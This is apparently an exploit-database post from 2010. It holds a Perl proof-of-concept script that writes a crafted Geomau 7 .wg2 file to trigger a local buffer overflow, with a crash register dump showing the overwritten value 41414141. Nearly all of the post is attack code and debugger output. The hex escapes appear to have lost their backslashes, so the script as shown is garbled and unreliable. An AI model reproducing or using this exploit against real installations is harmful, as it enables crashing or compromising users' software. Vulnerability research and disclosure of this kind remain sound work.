geomau-overflow.txt
Posted on 26 June 2010
################################################################### #Exploit Title : Geomau 7 (.wg2) local Buffer Overflow Poc #tested on windows xp SP 3 FR #Author: MadjiX - Dz8[at]HotmaiL[dot]CoM #download: http://math.exeter.edu/rparris/peanut/wgau32z.exe #Special Greets:Bibi-info , His0k4 [ where are you :( ] ################################################################### #EAX 0012F640 #ECX 00BB8F68 #EDX 00004789 #EBX 41414141 #ESP 0012F5F4 #EBP 0012F5F8 #ESI 00000032 #EDI 00000000 #EIP 0058AF23 wgeomau.0058AF23 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 0 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDF000(FFF) #T 0 GS 0000 NULL ################################################################### my $file = "MadjiX.wg2"; my $hd = "x71x02x00x00x32x00x00x00x42x01x00x00x5Fx00x00x00x00x02x00x00x00x02x00x00". "x00x00x00x00x01x00x00x00x3Dx00x00x00xD9xFFxFFxFFx2Cx01x00x00x64x00x00x00". "x64x00x00x00x00x00x00x00x00x00x00x00x0Ax00x00x00x0Fx00x00x00x2BxD0x28x01". "x49x1Ex29x01x00x00x00x00x0Cx00x00x00x0Ax00x00x00x0A"; my $junk = "x41" x 10000 ; open($FILE,">$file"); print $FILE $hd.$junk; close($FILE);
